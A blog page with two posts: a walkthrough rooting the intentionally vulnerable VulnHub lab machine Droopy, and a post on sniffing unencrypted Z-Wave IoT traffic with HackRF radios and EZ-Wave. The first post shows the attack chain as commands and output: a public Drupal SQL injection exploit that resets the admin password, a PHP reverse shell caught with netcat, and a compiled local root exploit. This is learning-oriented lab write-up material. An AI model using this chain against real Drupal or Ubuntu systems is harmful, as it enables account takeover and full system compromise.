Friday, 29 April 2016

Walkthrough Droopy v.02

Walkthrough Droopy v.02 :

In this post i shall outline the steps i followed to get root on Droopy hosted at vulnhub . https://www.vulnhub.com/entry/droopy-v02,143/.

From this post onwards i shall try to enlist all the useful links i used to compromise the box for posterity.

Detailed Steps to root :

A nmap scan of the box reveals that only port 80 is open and there seems to be a Drupal 7 website hosted.  After running nikto and dirbuster i decided to run a tool to enumerate CMS's. I know a good one exists for wordpress but surpisingly i could not find much for Drupal. I did come across a tool called CMSMap which according to this github page enumerates wordpress, drupal and joomla . I decided to give this a try to see any information it could reveal. Also i really wanted to be able to learn about Drupal enumeration tools and techniques.

Since the tool is not already built in Kali i decided to follow the github instructions and build it on my box.

./cmsmap.py -t http://192.168.238.132/ -f D -F
[-] Date & Time: 29/04/2016 07:31:43
[-] Target: http://192.168.238.132
[M] Website Not in HTTPS: http://192.168.238.132
[I] Server: Apache/2.4.7 (Ubuntu)
[I] X-Powered-By: PHP/5.5.9-1ubuntu4.5
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.238.132/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.30
[H] Drupal Vulnerable to SA-CORE-2014-005
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[I] Autocomplete Off Not Found: http://192.168.238.132/?q=user
[-] Drupal Default Files:
[I] http://192.168.238.132/README.txt
[I] http://192.168.238.132/INSTALL.mysql.txt
[I] http://192.168.238.132/MAINTAINERS.txt
[I] http://192.168.238.132/profiles/standard/translations/README.txt
[I] http://192.168.238.132/profiles/minimal/translations/README.txt
[I] http://192.168.238.132/INSTALL.pgsql.txt
[I] http://192.168.238.132/UPGRADE.txt
[I] http://192.168.238.132/CHANGELOG.txt
[I] http://192.168.238.132/INSTALL.sqlite.txt
[I] http://192.168.238.132/LICENSE.txt
[I] http://192.168.238.132/INSTALL.txt
[I] http://192.168.238.132/COPYRIGHT.txt
[I] http://192.168.238.132/web.config
[I] http://192.168.238.132/modules/README.txt
[I] http://192.168.238.132/modules/simpletest/files/README.txt
[I] http://192.168.238.132/modules/simpletest/files/javascript-1.txt
[I] http://192.168.238.132/modules/simpletest/files/php-1.txt
[I] http://192.168.238.132/modules/simpletest/files/sql-1.txt
[I] http://192.168.238.132/modules/simpletest/files/html-1.txt
[I] http://192.168.238.132/modules/simpletest/tests/common_test_info.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-output.txt
[I] http://192.168.238.132/modules/filter/tests/filter.url-input.txt
[I] http://192.168.238.132/modules/search/tests/UnicodeTest.txt
[I] http://192.168.238.132/themes/README.txt
[I] http://192.168.238.132/themes/stark/README.txt
[I] http://192.168.238.132/sites/README.txt
[I] http://192.168.238.132/sites/all/modules/README.txt
[I] http://192.168.238.132/sites/all/themes/README.txt
[I] http://192.168.238.132/modules/simpletest/files/html-2.html
[I] http://192.168.238.132/modules/color/preview.html
[I] http://192.168.238.132/themes/bartik/color/preview.html
[-] Interesting Directories/Files ...
[L] http://192.168.238.132/info.php
[L] http://192.168.238.132/install.php
[I] Forgotten Password Allows Username Enumeration: http://192.168.238.132/?q=user/password
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] aggregator
[I] block
[I] blog
[I] book
[I] color
[I] comment
[I] contact
[I] contextual
[I] dashboard
[I] dblog
[I] field
[I] field_ui
[I] file
[I] filter
[I] forum
[I] help
[I] image
[I] locale
[I] menu
[I] node
[I] openid
[I] overlay
[I] path
[I] php
[I] poll
[I] profile
[I] rdf
[I] search
[I] shortcut
[I] simpletest
[I] statistics
[I] syslog
[I] system
[I] taxonomy
[I] toolbar
[I] tracker
[I] translation
[I] trigger
[I] update
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/misc/
[L] http://192.168.238.132/modules/
[L] http://192.168.238.132/profiles/
[L] http://192.168.238.132/scripts/
[L] http://192.168.238.132/sites/
[L] http://192.168.238.132/includes/
[L] http://192.168.238.132/themes/
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/user
[L] http://192.168.238.132/modules/aggregator
[L] http://192.168.238.132/modules/block
[L] http://192.168.238.132/modules/blog
[L] http://192.168.238.132/modules/book
[L] http://192.168.238.132/modules/color
[L] http://192.168.238.132/modules/comment
[L] http://192.168.238.132/modules/contact
[L] http://192.168.238.132/modules/contextual
[L] http://192.168.238.132/modules/dashboard
[L] http://192.168.238.132/modules/dblog
[L] http://192.168.238.132/modules/field
[L] http://192.168.238.132/modules/field_ui
[L] http://192.168.238.132/modules/file
[L] http://192.168.238.132/modules/filter
[L] http://192.168.238.132/modules/forum
[L] http://192.168.238.132/modules/help
[L] http://192.168.238.132/modules/image
[L] http://192.168.238.132/modules/locale
[L] http://192.168.238.132/modules/menu
[L] http://192.168.238.132/modules/node
[L] http://192.168.238.132/modules/openid
[L] http://192.168.238.132/modules/overlay
[L] http://192.168.238.132/modules/path
[L] http://192.168.238.132/modules/php
[L] http://192.168.238.132/modules/poll
[L] http://192.168.238.132/modules/profile
[L] http://192.168.238.132/modules/rdf
[L] http://192.168.238.132/modules/search
[L] http://192.168.238.132/modules/shortcut
[L] http://192.168.238.132/modules/simpletest
[L] http://192.168.238.132/modules/statistics
[L] http://192.168.238.132/modules/syslog
[L] http://192.168.238.132/modules/system
[L] http://192.168.238.132/modules/taxonomy
[L] http://192.168.238.132/modules/toolbar
[L] http://192.168.238.132/modules/tracker
[L] http://192.168.238.132/modules/translation
[L] http://192.168.238.132/modules/trigger
[L] http://192.168.238.132/modules/update
[L] http://192.168.238.132/modules/user
[-] Date & Time: 29/04/2016 07:37:02
[-] Completed in: 0:05:19
view raw gistfile1.txt hosted with ❤ by GitHub


The tool was quite good at enumerating the Drupal website and immediately tells us that the site is outdated and suffers from a known vulnerability "Drupal Vulnerable to SA-CORE-2014-005".

Seems like there exists a possibility of launching SQL injection attacks against the box. I decided to use an existing exploit against the box. The exploit https://www.exploit-db.com/exploits/34984/ helps to change the admin credentials on the backend site.

python drupal_exploit.py http://192.168.238.132/ admin hello
host username password
http://nope.io admin wowsecure
Success!
Login now with user:admin and pass:hello
view raw gistfile1.txt hosted with ❤ by GitHub


The exploit worked and now we have changed the admin credentials on the box. We now login to the box with credentials "admin:hello".

Once we are able to login to the box we are able to create additional posts/pages. Checking under the "Modules" tab i see that there is a plugin called "phpfilter" which can be enabled to allow php content to be executed on the webpage. This opens the possibility of executing some php reverse shell code by creating a webpage and executing the same via the webserver. Hence we try this approach. I use standard reverse shell from pentest monkey.

nc -lvnp 4545
listening on [any] 4545 ...
connect to [192.168.238.133] from (UNKNOWN) [192.168.238.132] 51139
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
09:46:02 up 1:33, 0 users, load average: 0.05, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ hostname
droopy
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l
$ arch
x86_64
view raw gistfile1.txt hosted with ❤ by GitHub



Once we get a reverse shell we see that the box is a 64bit ubuntu 14.04 box which is known to be vulnerable to local priv escaltion exploit https://www.exploit-db.com/exploits/37292/ We compile and run the exploit to get root on the box .

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
view raw gistfile1.txt hosted with ❤ by GitHub

$ gcc ubuntu_ex.c -o ub
gcc ubuntu_ex.c -o ub
$ ./ub
./ub
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
view raw gistfile1.txt hosted with ❤ by GitHub
Also for completeness I must admit I could have also used a Metasploit module to get a shell but i wanted to avoid using metasploit as much as possible :0

Final Verdict :

Overall it was relatively easy box to pawn but fun nevertheless. Thanks for the creator to take time to create one . Keep up the good work "knightmare" .

Useful Links :

https://github.com/Dionach/CMSmap
https://www.drupal.org/SA-CORE-2014-005
https://www.exploit-db.com/exploits/37292/
https://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon

Posted by at No comments:

Wednesday, 13 April 2016

Z-wave protocol analysis using Ez-Wave

Background: Recently I was able to get my hands on a couple of IoT devices talking the propriety Z-wave protocol. Specifically I had 2 devices -

i) Z-Wave 3 in 1 PIR Motion sensor  which can detect movement, temperature and luminance.
ii) Z-Wave smart Energy Plug which can give information about the energy cosumption of the device connected to it. Also it can switch the device ON/OFF depending on the requests sent to it by a Z-Wave controller.

These devices are already deployed in many smart homes. Hence its important to analyze the security capabilities of these devices. This got me rolling and here is post about how to sniff Z-wave packets using SDR. It seems that the state of the art in pentesting any wireless comunnication protocol is by using these SDRs.

A detailed security assessment of Z-Wave protocol and Z-Wave enabled devices was presented at ShamooCon 2016 Breaking Bulbs Briskly by Bogus Broadcasts https://www.youtube.com/watch?v=IgquSEhAGvA by Joseph Hall and Ben Ramsey which details the how many Z-Wave device manufacturers disregard security and dont even encrypt the data exchanged between the Z-wave device and the Z-wave controller. This opens up possibilities of a range of attacks that can be launched on the Z-wave devices. They also release a open source tool to play around and sniff these packets called EZ-Wave . In this post i shall try to sniff some of the traffic generated by my Z-Wave devices.

EZ-wave Installation:

Install EZ-wave dependencies:

The instructions for installation are detailed on the github site @ https://github.com/AFITWiSec/EZ-Wave. However there are a number of software bundles that need to be installed especially the Gnu-radio which has a lot of dependencies. Hence instead of installing all these packages myself i used a linux distribution Pentoo Linux. (http://www.pentoo.ch/about). The advantage of using the Pentoo linux is that all the software requited for EZ-Wave installation such as GNU Radio, OsmocomSDR, HackRF host software, Wireshark etc  are all  pre-installed in the distro saving the time to install them manually.

The simplest way is to download the pentoo linux package from the downloads section of the site and then burn the image into a live USB stick. One important thing to note here is that Michael Ossmann (maker of HackRF) highly recommends in his "Introduction to SDR " tutorial (https://greatscottgadgets.com/sdr/) to not connect the HackRF to any virtual machine for performance reasons but to use it directly on the base OS.  Also on a side note if you are a newbie its highly recommended to go through at least his first tutorial where he introduces the SDR concepts  (https://greatscottgadgets.com/sdr/1/) and also the tutorial on HackRF usage. (https://greatscottgadgets.com/sdr/5/) .

We now boot from the live USB. (In case   you get an error like boot device not found press "Tab" on the keyboard and select pentoo5 OS or type it and press enter). The Pentoo linux should boot correctly. Launch an GUI using the "startx" command. In case there is no IP address allocated to the box just do a "dhcpcd eth0" to request an IP address.

Now to test that we have the HackRF software working correctly plugin the hackrf devices into the USB port and run the command "hackrf_info" . I use 2 Hackrfs since they are half-duplex and i wish to receive and transmit at the same time.

pentoo tools # hackrf_info
Found HackRF board 0:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x006a434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x0f54c1e1
Found HackRF board 1:
Board ID Number: 2 (HackRF One)
Firmware Version: 2014.08.1
Part ID Number: 0xa000cb3c 0x004f434b
Serial Number: 0x00000000 0x00000000 0x14d463dc 0x2f7c35e1
pentoo tools #
view raw gistfile1.txt hosted with ❤ by GitHub

Install Scapy-Radio 

We can see that both our devices are correctly detected. Next we install the EZ-wave tool itself. We run the setup.sh script which clones the scapy framework
and then we install it.

./setup.sh
cd root/scapy-radio
./install.sh scapy
./install.sh blocks
./install.sh grc
view raw gistfile1.txt hosted with ❤ by GitHub


I noticed that if you use pentoo linux then you dont need to worry about making changes to the gnu-radio config file.

Install Wireshark

We downloaded the source package for wireshark version 1.12.10 from https://www.wireshark.org/download/src/.  Copy the wireshark dissectors files to the wireshark-1.12.10/epan/dissectors. Wireshark by default tries to use Qt version5 for building the wireshark UI. This gave me errors so i choose to make my wireshark ui with gtk3. Hence its important to tell wireshark to use gtk3 library instead of qt5 libraries at the config stage. Hence our steps to build wireshark were

pentoo wireshark-1.12.10 # ./autogen.sh
aclocal -I ./aclocal-fallback
libtoolize --copy --force
....
....
....
Now type "./configure [options]" and "make" to compile Wireshark.
pentoo wireshark-1.12.10 # ./configure --with-qt=no --with-gtk3=yes
checking build system type... i686-pc-linux-gnu
checking host system type... i686-pc-linux-gnu
....
....
....
config.status: executing libtool commands
The Wireshark package has been configured with the following options.
Build wireshark (Gtk+) : yes (with GTK+ 3)
Build wireshark-qt : no
Build tshark : yes
Build capinfos : yes
Build captype : yes
Build editcap : yes
Build dumpcap : yes
Build mergecap : yes
Build reordercap : yes
Build text2pcap : yes
Build randpkt : yes
Build dftest : yes
Build rawshark : yes
Save files as pcap-ng by default : yes
Install dumpcap with capabilities : no
Install dumpcap setuid : no
Use dumpcap group : (none)
Use plugins : yes
Use Lua library : yes
Use Python binding : no
Build rtp_player : yes
Build profile binaries : no
Use pcap library : yes
Use zlib library : yes
Use kerberos library : yes (MIT)
Use c-ares library : yes
Use GNU ADNS library : no (using c-ares instead)
Use SMI MIB library : yes
Use GNU crypto library : yes
Use SSL crypto library : no
Use IPv6 name resolution : yes
Use gnutls library : yes
Use POSIX capabilities library : yes
Use GeoIP library : yes
Use nl library : yes (v3)
Use SBC codec library : yes
pentoo wireshark-1.12.10 # make
pentoo wireshark-1.12.10 # sudo make install
pentoo wireshark-1.12.10 # ldconfig
view raw gistfile1.txt hosted with ❤ by GitHub


EZ-Wave Usage:

In order to sniff packets we start gnu-radio companion  and provide it as input the Zwave radio configuration file.

Select the Zwave.grc file to open in the gnuradio-companion

One important thing to take note of in the .grc file is the variable central frequency i.e center_freq . The European standard Z-wave devices ( which I have ) talk on 868.42 Mhz ( instead of the default central frequency hardcoded in the .grc file which is for the US Z-wave devices) and hence this variable needs to be changed to reflect the frequency of your device. To change the variable double click it and then key in the new value.

gnuradio-companion main window
After changing the .grc file we need to recompile the flow graph. Finally we can run it by pressing the play button on the top menu. (Also make sure that the python modules are in the python path environment variable else there may be some errors)

The HackRFs should now be able to pick up Z-wave packets in the vicinity. I forced the Z-wave device to send some packets by pressing the button on the device body. All the captured Z-wave packets are sent to localhost:52002 and can be seen using the wireshark and the new dissector. You can apply some filters like !icmp to remove the interrogation commands sent to the Z-wave devices.

Wireshark Z-wave packet capture

We can see the homid and nodeid of the captured Z-wave packet. The data exchanged between the Z-wave controller and the Z-wave device is also not encrypted.


Posted by at 12 comments:
Subscribe to: Posts (Atom)